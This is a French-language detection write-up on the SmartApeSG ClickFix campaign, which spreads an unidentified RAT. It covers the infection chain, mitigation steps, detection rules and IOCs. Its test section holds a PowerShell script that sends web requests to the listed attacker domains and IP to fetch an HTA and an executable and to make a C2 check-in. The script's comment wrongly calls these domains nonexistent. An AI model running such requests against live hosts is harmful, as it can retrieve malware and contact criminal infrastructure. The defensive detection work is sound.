SmartApeSG Diffuse un RAT Inconnu par des Leurres ClickFix
Detection stack
- AIDR
- Alert
- ETL
- Query
Résumé
La campagne SmartApeSG utilise la technique ClickFix pour tromper les utilisateurs en leur faisant exécuter des commandes malveillantes à travers de fausses pages CAPTCHA ou de vérification humaine. Cette action lance un fichier HTA qui télécharge et extrait une archive ZIP malveillante. La charge finale est un cheval de Troie d’accès à distance (RAT) non identifié qui s’appuie sur le chargement latéral de DLL pour établir une persistance et communiquer avec son infrastructure de commande et de contrôle (C2).
Enquête
L’enquête a inclus l’analyse du trafic HTTPS, des fichiers PCAP et des archives malveillantes liées à l’activité de SmartApeSG. Les chercheurs ont identifié du JavaScript malveillant injecté dans des sites Web légitimes et ont retracé la chaîne d’infection d’une commande injectée dans le presse-papiers à la connexion finale avec le C2. Le RAT a été observé en train de communiquer avec une adresse IP externe sur le port 443 en utilisant du trafic chiffré.
Atténuation
Les organisations devraient utiliser le filtrage Web pour bloquer les domaines malveillants connus, y compris pewtercanto[.]top and deltaode[.]com. Les utilisateurs devraient être formés à reconnaître les méthodes d’ingénierie sociale telles que les faux CAPTCHAs et les instructions ClickFix. Restreindre l’exécution de fichiers HTA et surveiller les processus enfants suspects lancés par les navigateurs ou les commandes Run peut également réduire le risque.
Réponse
Si une activité SmartApeSG est détectée, le point d’extrémité affecté devrait être isolé immédiatement pour interrompre la communication C2. Les enquêteurs devraient examiner les répertoires AppData et Documents pour identifier le RAT et ses mécanismes de persistance. La télémétrie des points d’extrémité devrait également être examinée pour détecter une exécution non autorisée de HTA, une manipulation du presse-papiers et une activité de chargement latéral de DLL.
Flux d’attaque
Détections
Commande et contrôle suspects par requête DNS avec un domaine de premier niveau (TLD) inhabituel (via dns)
Proof of Value
Variables d’environnement suspectes (via cmdline)
Proof of Value
Exécution suspecte de Mshta sans fichier HTA (via cmdline)
Proof of Value
Domaine de premier niveau inhabituel dans la ligne de commande (via cmdline)
Proof of Value
IOCs (HashSha256) pour détecter : Campagne SmartApeSG ClickFix poussant un RAT non identifié
Proof of Value
IOCs (SourceIP) pour détecter : Campagne SmartApeSG ClickFix poussant un RAT non identifié
Proof of Value
IOCs (DestinationIP) pour détecter : Campagne SmartApeSG ClickFix poussant un RAT non identifié
Proof of Value
Activité RAT de la campagne SmartApeSG ClickFix [Connexion réseau Windows]
Proof of Value
Détection de RAT non identifié par chargement latéral de DLL par la campagne SmartApeSG [Événement fichier Windows]
Proof of Value
Exécution de simulation
Prérequis : Le contrôle préalable de télémétrie et baseline doit avoir été validé.
Raisonnement : Cette section détaille l’exécution précise de la technique (TTP) de l’adversaire conçue pour déclencher la règle de détection. Les commandes et le récit DOIVENT refléter directement les TTPs identifiés et viser à générer la télémétrie exacte attendue par la logique de détection. Des exemples abstraits ou non liés mèneront à des erreurs de diagnostic.
-
Narratif et commandes d’attaque : L’adversaire exécute la campagne SmartApeSG ClickFix. Après qu’un utilisateur ait été trompé pour effectuer une action malveillante (souvent une fausse mise à jour du navigateur), le système tente de télécharger un fichier HTA malveillant. Le HTA initie ensuite une connexion à l’infrastructure C2 pour télécharger la charge finale RAT. Pour simuler cela, nous générerons des requêtes réseau qui atteindront les chaînes exactes définies dans la logique de détection :
deltaode.compo,deltaode.com/wv, et l’IP89.124.79.98. -
Script de test de régression :
# Script de simulation pour déclencher la règle de détection SmartApeSG # Ce script simule les requêtes réseau vers les IoCs spécifiques $urls = @( "https://deltaode.compo/payload.hta", "https://deltaode.com/wv/malicious.exe", "http://89.124.79.98:443/c2_checkin" ) foreach ($url in $urls) { Write-Host "Simulation de la requête vers : $url" try { # Utilisation d'Invoke-WebRequest pour générer la télémétrie réseau # Nous utilisons -ErrorAction SilentlyContinue car ces domaines n'existent pas réellement Invoke-WebRequest -Uri $url -UseBasicParsing -ErrorAction SilentlyContinue } catch { Write-Host "Requête échouée (comme prévu), mais la télémétrie devrait être générée." } } -
Commandes de nettoyage :
# Aucun changement permanent n'a été fait au système ; aucun nettoyage n'est requis. Write-Host "Simulation terminée. Aucun artefact laissé sur le système."